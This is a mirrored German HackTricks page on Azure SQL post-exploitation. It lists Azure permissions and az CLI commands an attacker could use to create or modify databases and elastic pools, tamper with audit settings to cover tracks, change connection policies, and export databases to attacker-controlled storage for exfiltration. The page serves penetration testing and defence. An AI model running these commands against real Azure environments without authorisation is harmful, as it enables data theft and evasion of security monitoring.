mirror of
https://github.com/HackTricks-wiki/hacktricks-cloud.git
synced 2026-01-14 05:46:25 -08:00
91 lines
5.1 KiB
Markdown
91 lines
5.1 KiB
Markdown
# Az - SQL-Datenbank Post-Exploitation
|
|
|
|
{{#include ../../../banners/hacktricks-training.md}}
|
|
|
|
## SQL-Datenbank Post-Exploitation
|
|
|
|
Für weitere Informationen zur SQL-Datenbank siehe:
|
|
|
|
{{#ref}}
|
|
../az-services/az-sql.md
|
|
{{#endref}}
|
|
|
|
### "Microsoft.Sql/servers/databases/read", "Microsoft.Sql/servers/read" && "Microsoft.Sql/servers/databases/write"
|
|
|
|
Mit diesen Berechtigungen kann ein Angreifer Datenbanken innerhalb der kompromittierten Umgebung erstellen und aktualisieren. Diese Post-Exploitation-Aktivität könnte es einem Angreifer ermöglichen, bösartige Daten hinzuzufügen, Datenbankkonfigurationen zu ändern oder Hintertüren für weitere Persistenz einzufügen, was potenziell den Betrieb stören oder zusätzliche bösartige Aktionen ermöglichen könnte.
|
|
```bash
|
|
# Create Database
|
|
az sql db create --resource-group <resource-group> --server <server-name> --name <new-database-name>
|
|
|
|
# Update Database
|
|
az sql db update --resource-group <resource-group> --server <server-name> --name <database-name> --max-size <max-size-in-bytes>
|
|
```
|
|
### "Microsoft.Sql/servers/elasticPools/write" && "Microsoft.Sql/servers/elasticPools/read"
|
|
|
|
Mit diesen Berechtigungen kann ein Angreifer elasticPools innerhalb der kompromittierten Umgebung erstellen und aktualisieren. Diese Post-Exploitation-Aktivität könnte es einem Angreifer ermöglichen, bösartige Daten hinzuzufügen, Datenbankkonfigurationen zu ändern oder Hintertüren für weitere Persistenz einzufügen, was potenziell den Betrieb stören oder zusätzliche bösartige Aktionen ermöglichen könnte.
|
|
```bash
|
|
# Create Elastic Pool
|
|
az sql elastic-pool create \
|
|
--name <new-elastic-pool-name> \
|
|
--server <server-name> \
|
|
--resource-group <resource-group> \
|
|
--edition <edition> \
|
|
--dtu <dtu-value>
|
|
|
|
# Update Elastic Pool
|
|
az sql elastic-pool update \
|
|
--name <elastic-pool-name> \
|
|
--server <server-name> \
|
|
--resource-group <resource-group> \
|
|
--dtu <new-dtu-value> \
|
|
--tags <key=value>
|
|
```
|
|
### "Microsoft.Sql/servers/auditingSettings/read" && "Microsoft.Sql/servers/auditingSettings/write"
|
|
|
|
Mit dieser Berechtigung können Sie die Überwachungseinstellungen auf einem Azure SQL Server ändern oder aktivieren. Dies könnte einem Angreifer oder autorisierten Benutzer ermöglichen, die Auditkonfigurationen zu manipulieren, möglicherweise Spuren zu verwischen oder Auditprotokolle an einen Ort umzuleiten, der unter ihrer Kontrolle steht. Dies kann die Sicherheitsüberwachung behindern oder es ermöglichen, die Aktionen nachverfolgen zu können. HINWEIS: Um die Überwachung für einen Azure SQL Server mit Blob Storage zu aktivieren, müssen Sie ein Speicherkonto anhängen, in dem die Auditprotokolle gespeichert werden können.
|
|
```bash
|
|
az sql server audit-policy update \
|
|
--server <server_name> \
|
|
--resource-group <resource_group_name> \
|
|
--state Enabled \
|
|
--storage-account <storage_account_name> \
|
|
--retention-days 7
|
|
```
|
|
### "Microsoft.Sql/locations/connectionPoliciesAzureAsyncOperation/read", "Microsoft.Sql/servers/connectionPolicies/read" && "Microsoft.Sql/servers/connectionPolicies/write"
|
|
|
|
Mit dieser Berechtigung können Sie die Verbindungsrichtlinien eines Azure SQL Servers ändern. Diese Fähigkeit kann ausgenutzt werden, um serverseitige Verbindungseinstellungen zu aktivieren oder zu ändern.
|
|
```bash
|
|
az sql server connection-policy update \
|
|
--server <server_name> \
|
|
--resource-group <resource_group_name> \
|
|
--connection-type <Proxy|Redirect|Default>
|
|
```
|
|
### "Microsoft.Sql/servers/databases/export/action"
|
|
|
|
Mit dieser Berechtigung können Sie eine Datenbank von einem Azure SQL Server in ein Speicherkonto exportieren. Ein Angreifer oder autorisierter Benutzer mit dieser Berechtigung kann sensible Daten aus der Datenbank exfiltrieren, indem er sie an einen Ort exportiert, den er kontrolliert, was ein erhebliches Risiko für Datenverletzungen darstellt. Es ist wichtig, den Speicher-Schlüssel zu kennen, um dies durchführen zu können.
|
|
```bash
|
|
az sql db export \
|
|
--server <server_name> \
|
|
--resource-group <resource_group_name> \
|
|
--name <database_name> \
|
|
--storage-uri <storage_blob_uri> \
|
|
--storage-key-type SharedAccessKey \
|
|
--admin-user <admin_username> \
|
|
--admin-password <admin_password>
|
|
|
|
```
|
|
### "Microsoft.Sql/servers/databases/import/action"
|
|
|
|
Mit dieser Berechtigung können Sie eine Datenbank in einen Azure SQL Server importieren. Ein Angreifer oder autorisierter Benutzer mit dieser Berechtigung kann potenziell bösartige oder manipulierte Datenbanken hochladen. Dies kann dazu führen, dass Kontrolle über sensible Daten erlangt wird oder schädliche Skripte oder Trigger in die importierte Datenbank eingebettet werden. Zusätzlich können Sie sie auf Ihren eigenen Server in Azure importieren. Hinweis: Der Server muss Azure-Dienste und -Ressourcen den Zugriff auf den Server erlauben.
|
|
```bash
|
|
az sql db import --admin-user <admin-user> \
|
|
--admin-password <admin-password> \
|
|
--name <target-database-name> \
|
|
--server <azure-sql-server-name> \
|
|
--resource-group <resource-group-name> \
|
|
--storage-key-type SharedAccessKey \
|
|
--storage-key <storage-account-key> \
|
|
--storage-uri "https://<storage-account-name>.blob.core.windows.net/bacpac-container/MyDatabase.bacpac"
|
|
```
|
|
{{#include ../../../banners/hacktricks-training.md}}
|